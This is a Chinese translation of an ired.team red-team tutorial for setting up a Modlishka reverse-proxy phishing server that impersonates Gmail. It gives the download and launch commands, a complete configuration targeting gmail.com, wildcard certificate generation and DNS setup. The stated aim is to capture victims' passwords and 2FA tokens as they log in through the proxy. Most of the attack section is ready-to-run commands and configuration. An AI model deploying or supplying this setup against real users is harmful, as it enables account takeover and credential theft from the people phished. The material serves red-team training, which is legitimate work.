通过Modlishka HTTP反向代理进行网络钓鱼

通过Modlishka HTTP反向代理进行网络钓鱼

这个实验展示了怎样建立一个HTTPModlishka反向代理,这个代理可以被用来进行网络钓鱼活动来获取用户密码和2FA tokens。Modlsshka使用这一切变为了可能,因为它处在了你模仿的想要攻击的网页和受害者之间,记录了所有流量/tokens/密码的传输。

建立

让我们从建立一个数据海洋中的水滴开始,虽然小但是绰绰有余。

登陆后,安装证书机器人并下载modlsshka二进制。

1
2
3
apt install certbot
wget https://github.com/drk1wi/Modlishka/releases/download/v.1.1.0/Modlishka-linux-amd64
chmod +x Modlishka-linux-amd64 ; ls -lah

配置Modlishka

让我们为modlishka创建一个配置文件

文件内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
{
//domain that you will be tricking your victim of visiting
"proxyDomain": "redteam.me",
"listeningAddress": "0.0.0.0",

//domain that you want your victim to think they are visiting
"target": "gmail.com",
"targetResources": "",
"targetRules": "PC9oZWFkPg==:",
"terminateTriggers": "",
"terminateRedirectUrl": "",
"trackingCookie": "id",
"trackingParam": "id",
"jsRules":"",
"forceHTTPS": false,
"forceHTTP": false,
"dynamicMode": false,
"debug": true,
"logPostOnly": false,
"disableSecurity": false,
"log": "requests.log",
"plugins": "all",
"cert": "",
"certKey": "",
"certPool": ""
}

通配符证书

很重要 - 让我们为自己的域生成一个通配符证书,我希望我网络钓鱼的目标受害者登陆*.redteam.me

1
certbot certonly --manual --preferred-challenges=dns --server https://acme-v02.api.letsencrypt.org/directory --agree-tos -d *.redteam.me --email noreply@live.com

这将产生一个如下的质询代码

我们需要在DNS管理控制台为我们的域名redteam.me创建一个DNS TXT记录,在本次试验中是Digital Ocean

创建DNS TXT记录之后,继续生成我们的证书

证书生成完成之后,我们需要将他们转换为适合嵌入在JSON对象的格式

1
2
awk '{printf "%s\\n", $0}' /etc/letsencrypt/live/redteam.me/fullchain.pem
awk '{printf "%s\\n", $0}' /etc/letsencrypt/live/redteam.me/privkey.pem

这步完成之后,将证书内容复制到配置文件 - fullchain.pem内容复制到certprivkey.pem内容复制到certKey

更多的DNS记录

让我们为了根主机@构造一个A记录,只需指向服务器IP

这一部非常重要 - 我们需要一个CNAME记录,任何一个字域名*指向@

启动Modlishka

我们已经准备好了通过启动modlishka并给它modlishka.json配置文件来测试

1
./Modlishka-linux-amd64 -config modlishka.json

下面展示了如何访问 redteam.me,我收到了gmail.com的内容 - 表明Modlishka和反向代理成功工作。再次强调(我们没有创造目标网站的任何副本或者模板)受害者实际是在浏览gmail,它只是通过Modlishka提供服务,在那里检查流量并捕获密码。

本文翻译自https://ired.team/offensive-security/red-team-infrastructure/how-to-setup-modliska-reverse-http-proxy-for-phishing#wildcard-certificates